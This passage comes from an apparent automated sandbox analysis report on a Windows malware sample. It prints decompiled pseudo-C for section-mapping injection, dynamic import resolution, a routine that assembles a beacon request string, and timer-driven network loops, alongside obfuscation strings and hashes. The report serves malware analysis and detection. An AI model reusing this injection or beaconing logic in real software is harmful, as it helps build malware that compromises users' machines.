GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 022BA576
ResetEvent.KERNEL32(?), ref: 022BA5EF
InternetReadFile.WININET(?,?,00001000,?), ref: 022BA600
GetLastError.KERNEL32 ref: 022BA60A

Part of subcall function 022B57DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 022B57F4
Part of subcall function 022B57DD: SetEvent.KERNEL32(?), ref: 022B5804
Part of subcall function 022B57DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 022B5836
Part of subcall function 022B57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B585B
Part of subcall function 022B57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B587B

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
String ID:
API String ID: 2393427839-0
Opcode ID: 308c112f11f5c865d2bb51e072ba091c99ce5cd26c7d8bad86e800bc38ad7837
Instruction ID: 7200003d94d4a0badf2fe8f2f83d211c657a727ff66d8adc2032ed9f2ab1ca94
Opcode Fuzzy Hash: 308c112f11f5c865d2bb51e072ba091c99ce5cd26c7d8bad86e800bc38ad7837
Instruction Fuzzy Hash: 7241C372A20605ABCF239FF4DC44BEE77B9AF883E0F140929E556D7294DB70D9418B50

Uniqueness

Uniqueness Score: -1.00%

Function 00401C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401C90(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401703(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401c99
0x00401ca0
0x00401ca1
0x00401ca2
0x00401ca3
0x00401ca4
0x00401cb5
0x00401cb9
0x00401ccd
0x00401cd0
0x00401cd3
0x00401cda
0x00401cdd
0x00401ce4
0x00401ce7
0x00401cea
0x00401ced
0x00401cf2
0x00401d2d
0x00401cf4
0x00401cf7
0x00401cfd
0x00401d02
0x00401d06
0x00401d24
0x00401d08
0x00401d0f
0x00401d1d
0x00401d1d
0x00401d06
0x00401d35

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED

Part of subcall function 00401703: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730

memset.NTDLL ref: 00401D0F

Strings

@, xrefs: 00401CDD

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction ID: d00bf08d6aa1ecb95d0b181047dcd8cf727594324f693dbf64d6d2eb4fe127ad
Opcode Fuzzy Hash: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction Fuzzy Hash: E521F9B5D0020DAFDB11DFA9C8849DEFBB9EF48354F10843AE615F3250D734AA458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401264(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x403100;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00401264
0x0040126d
0x00401272
0x00401278
0x00401281
0x00401287
0x00401289
0x0040128c
0x00401291
0x00401298
0x00401298
0x0040129c
0x004012a2
0x004012a7
0x00000000
0x00000000
0x004012ad
0x004012b7
0x004012b9
0x004012bc
0x004012bf
0x004012c3
0x004012cb
0x004012cd
0x004012d0
0x00401338
0x00401338
0x0040133c
0x00000000
0x00000000
0x004012d5
0x004012db
0x004012dd
0x004012f0
0x004012f3
0x004012f3
0x004012f3
0x004012f7
0x004012df
0x004012df
0x004012e7
0x004012e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004012e9
0x004012d7
0x004012d7
0x004012eb
0x004012eb
0x004012eb
0x004012fa
0x004012fd
0x004012ff
0x00401306
0x00401301
0x00401301
0x00401301
0x0040130e
0x00401314
0x00401316
0x00401346
0x00401318
0x00401318
0x0040131b
0x0040131d
0x00401325
0x00401325
0x0040132a
0x0040132c
0x00401333
0x00401335
0x00401335
0x00401335
0x00000000
0x00401335
0x00000000
0x00401316
0x004012c5
0x004012c5
0x004012c9
0x00000000
0x00000000
0x004012c9
0x00401349
0x00401349
0x00401350
0x00401355
0x00000000
0x00000000
0x0040135b
0x00401366
0x00000000
0x00401366
0x0040135d
0x0040135d
0x00401363
0x00000000
0x00401363
0x00401291
0x00401367
0x0040136c

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0040129C
GetProcAddress.KERNEL32(?,00000000), ref: 0040130E

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
Instruction ID: 08ebcf6dcd3e0bd4ed0640795f354858f0b5a52c81c2c864c780740fbe29bbaa
Opcode Fuzzy Hash: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
Instruction Fuzzy Hash: 74312771A002069BDB14CF99C894AAEB7F4BF08354B1440BED901FB3A0E778EA41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401703(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401715
0x0040171b
0x00401729
0x00401730
0x00401735
0x0040173b
0x00000000
0x0040173c
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 5d5daab65626f5a8b20b58ce6b1aa041d559c67da48c763f4c54447031275def
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 10F037B590020CFFDB119FA5CC85CAFBBBDEB44394B10493AF152E20A0D6309E499B61

Uniqueness

Uniqueness Score: -1.00%

Function 022B9BF1, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E022B9BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x22bd018; // 0x139c7884
				asm("bswap eax");
				_t27 =  *0x22bd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x22bd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x22bd00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x22bd2a8; // 0x24ba5a8
				_t3 = _t30 + 0x22be633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x22bd02c,  *0x22bd004, _t25);
				_t33 = E022B3288();
				_t34 =  *0x22bd2a8; // 0x24ba5a8
				_t4 = _t34 + 0x22be673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E022B831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x22bd2a8; // 0x24ba5a8
					_t6 = _t83 + 0x22be8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x22bd238, 0, _t96);
				}
				_t97 = E022B9267();
				if(_t97 != 0) {
					_t78 =  *0x22bd2a8; // 0x24ba5a8
					_t8 = _t78 + 0x22be8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x22bd238, 0, _t97);
				}
				_t98 =  *0x22bd32c; // 0x47795b0
				_a32 = E022B284E(0x22bd00a, _t98 + 4);
				_t42 =  *0x22bd2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x22bd2a8; // 0x24ba5a8
					_t11 = _t74 + 0x22be8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x22bd2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x22bd2a8; // 0x24ba5a8
					_t13 = _t71 + 0x22be88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x22bd238, 0, 0x800);
					if(_t100 != 0) {
						E022B3239(GetTickCount());
						_t50 =  *0x22bd32c; // 0x47795b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x22bd32c; // 0x47795b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x22bd32c; // 0x47795b0
						_t103 = E022B7B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x22bc28c);
							_push(_t103);
							_t62 = E022BA677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E022B933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E022B5433();
								}
								HeapFree( *0x22bd238, 0, _v44);
							}
							RtlFreeHeap( *0x22bd238, 0, _t103); // executed
						}
						RtlFreeHeap( *0x22bd238, 0, _t100); // executed
					}
					HeapFree( *0x22bd238, 0, _a24);
				}
				RtlFreeHeap( *0x22bd238, 0, _t105); // executed
				return _a4;
			}

0x022b9bf1
0x022b9bf1
0x022b9bf1
0x022b9bf6
0x022b9bfc
0x022b9c06
0x022b9c08
0x022b9c08
0x022b9c15
0x022b9c20
0x022b9c23
0x022b9c2e
0x022b9c31
0x022b9c36
0x022b9c39
0x022b9c3e
0x022b9c41
0x022b9c4d
0x022b9c5a
0x022b9c5c
0x022b9c62
0x022b9c67
0x022b9c72
0x022b9c74
0x022b9c77
0x022b9c79
0x022b9c7e
0x022b9c82
0x022b9c84
0x022b9c89
0x022b9c95
0x022b9c97
0x022b9ca3
0x022b9ca5
0x022b9ca5
0x022b9cb0
0x022b9cb4
0x022b9cb6
0x022b9cbb
0x022b9cc7
0x022b9cc9
0x022b9cd5
0x022b9cd7
0x022b9cd7
0x022b9cdd
0x022b9cf0
0x022b9cf4
0x022b9cfb
0x022b9cfe
0x022b9d03
0x022b9d0e
0x022b9d10
0x022b9d13
0x022b9d13
0x022b9d15
0x022b9d1c
0x022b9d1f
0x022b9d24
0x022b9d2e
0x022b9d30
0x022b9d38
0x022b9d51
0x022b9d55
0x022b9d61
0x022b9d66
0x022b9d6f
0x022b9d80
0x022b9d84
0x022b9d8d
0x022b9d93
0x022b9da0
0x022b9dad
0x022b9db3
0x022b9dbf
0x022b9dc5
0x022b9dc6
0x022b9dcb
0x022b9dd1
0x022b9dd7
0x022b9dde
0x022b9de5
0x022b9deb
0x022b9df2
0x022b9df6
0x022b9e01
0x022b9e06
0x022b9e0c
0x022b9e15
0x022b9e15
0x022b9e26
0x022b9e26
0x022b9e35
0x022b9e35
0x022b9e44
0x022b9e44
0x022b9e56
0x022b9e56
0x022b9e65
0x022b9e76

APIs

GetTickCount.KERNEL32 ref: 022B9C08
wsprintfA.USER32 ref: 022B9C55
wsprintfA.USER32 ref: 022B9C72
wsprintfA.USER32 ref: 022B9C95
HeapFree.KERNEL32(00000000,00000000), ref: 022B9CA5
wsprintfA.USER32 ref: 022B9CC7
HeapFree.KERNEL32(00000000,00000000), ref: 022B9CD7
wsprintfA.USER32 ref: 022B9D0E
wsprintfA.USER32 ref: 022B9D2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 022B9D4B
GetTickCount.KERNEL32 ref: 022B9D5B
RtlEnterCriticalSection.NTDLL(04779570), ref: 022B9D6F
RtlLeaveCriticalSection.NTDLL(04779570), ref: 022B9D8D

Part of subcall function 022B7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?,047795B0), ref: 022B7BB8
Part of subcall function 022B7B8D: lstrlen.KERNEL32(?,?,?,022B9DA0,?,047795B0), ref: 022B7BC0
Part of subcall function 022B7B8D: strcpy.NTDLL ref: 022B7BD7
Part of subcall function 022B7B8D: lstrcat.KERNEL32(00000000,?), ref: 022B7BE2
Part of subcall function 022B7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B7BFF

StrTrimA.SHLWAPI(00000000,022BC28C,?,047795B0), ref: 022B9DBF

Part of subcall function 022BA677: lstrlen.KERNEL32(04779BF8,00000000,00000000,7691C740,022B9DCB,00000000), ref: 022BA687
Part of subcall function 022BA677: lstrlen.KERNEL32(?), ref: 022BA68F
Part of subcall function 022BA677: lstrcpy.KERNEL32(00000000,04779BF8), ref: 022BA6A3
Part of subcall function 022BA677: lstrcat.KERNEL32(00000000,?), ref: 022BA6AE

lstrcpy.KERNEL32(00000000,?), ref: 022B9DDE
lstrcpy.KERNEL32(00000000,00000000), ref: 022B9DE5
lstrcat.KERNEL32(00000000,?), ref: 022B9DF2
lstrcat.KERNEL32(00000000,00000000), ref: 022B9DF6

Part of subcall function 022B933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 022B93EC

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 022B9E26
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 022B9E35
RtlFreeHeap.NTDLL(00000000,00000000,?,047795B0), ref: 022B9E44
HeapFree.KERNEL32(00000000,00000000), ref: 022B9E56
RtlFreeHeap.NTDLL(00000000,?), ref: 022B9E65

Strings

Ut, xrefs: 022B9CA5, 022B9CD7, 022B9E26, 022B9E35, 022B9E44, 022B9E56, 022B9E65

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID: Ut
API String ID: 3080378247-8415677
Opcode ID: 227cf3743ec39c210eddf8a5f2d03232fa7eec4fe1d853547c93e7bb506da722
Instruction ID: d4a9829ebbca0b079d719b9c54c6666c2888b8453a311babdc79f479b5c94a18
Opcode Fuzzy Hash: 227cf3743ec39c210eddf8a5f2d03232fa7eec4fe1d853547c93e7bb506da722
Instruction Fuzzy Hash: 9261AA31D80241AFD713ABE4FC4CF9A7BA8EF48390F050915FA08C7261DB24E9658F21

Uniqueness

Uniqueness Score: -1.00%

Function 0042EF00, Relevance: 37.7, APIs: 4, Strings: 17, Instructions: 924COMMON

Download Yara Rule

Strings

xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F572
mikujukezicuharu, xrefs: 0042F61C
zetipabobutobawekicugi, xrefs: 0042F60D
furafizasuyesipebokevocejirijan, xrefs: 0042F617
pemahu, xrefs: 0042F1F9
Vefu mif kaxigija puhirege puwuf, xrefs: 0042F248
Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F24D
2Y?, xrefs: 0042F592
mecevituxe, xrefs: 0042F612
dunuviwujamenopigomareg, xrefs: 0042F2B7
\H, xrefs: 0042F51D
Regefiri, xrefs: 0042F252
ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F2C3
geceyuhocavanino goruyitozekitapopit, xrefs: 0042F2D9
zijiwe, xrefs: 0042F53E
Xegixaze, xrefs: 0042F2C8
iyeg xogahes yoxohavit jobikuz, xrefs: 0042F2BE

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID:
String ID: 2Y?$Hagavete buyihexinag remibumepupabo gojokekisila$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$dunuviwujamenopigomareg$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
API String ID: 0-3330016514
Opcode ID: 846039d5df4024a12244b577df4387b1ca82c6556dfbf2ded9338e41f6ed5a34
Instruction ID: 51b13d8c1e7f4ee73c7fd78973e9ef6d82c99fdbf4cfe7d70cdb8559879fd166
Opcode Fuzzy Hash: 846039d5df4024a12244b577df4387b1ca82c6556dfbf2ded9338e41f6ed5a34
Instruction Fuzzy Hash: D4622C71144390BFE3209BA1EE4DFAF7BB8EB89B41F00452DF24AE50A0D7B45545CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0042EF77, Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 679COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042F1E8

Strings

xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F572
mikujukezicuharu, xrefs: 0042F61C
zetipabobutobawekicugi, xrefs: 0042F60D
furafizasuyesipebokevocejirijan, xrefs: 0042F617
pemahu, xrefs: 0042F1F9
Vefu mif kaxigija puhirege puwuf, xrefs: 0042F248
Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F24D
2Y?, xrefs: 0042F592
mecevituxe, xrefs: 0042F612
dunuviwujamenopigomareg, xrefs: 0042F2B7
\H, xrefs: 0042F51D
Regefiri, xrefs: 0042F252
ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F2C3
geceyuhocavanino goruyitozekitapopit, xrefs: 0042F2D9
zijiwe, xrefs: 0042F53E
Xegixaze, xrefs: 0042F2C8
iyeg xogahes yoxohavit jobikuz, xrefs: 0042F2BE

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset
String ID: 2Y?$Hagavete buyihexinag remibumepupabo gojokekisila$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$dunuviwujamenopigomareg$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
API String ID: 2102423945-3330016514
Opcode ID: 4c9e2c1dd9026e5c4093277696a849a3cc7aeb5ea9774350c3b02a11d3877a8e
Instruction ID: 0df97d7b5a907e6a529e4a3b8104accf8c4749e539e08799282dbba88a821ffc
Opcode Fuzzy Hash: 4c9e2c1dd9026e5c4093277696a849a3cc7aeb5ea9774350c3b02a11d3877a8e
Instruction Fuzzy Hash: 45324F71249350BFE3209BA0EE49FDB7BA8EF89741F404529F34AE50A0D7B45544CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 022B7C3D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E022B7C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x22bd240);
					_v20 = 0;
					_v16 = 0;
					L022BAF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x22bd26c; // 0x1ac
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x22bd24c = 5;
						} else {
							_t68 = E022B5319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x22bd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E022B2C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E022B9870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x22bd244);
							goto L21;
						} else {
							__eflags =  *0x22bd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E022B5433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x22bd248);
								L21:
								L022BAF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
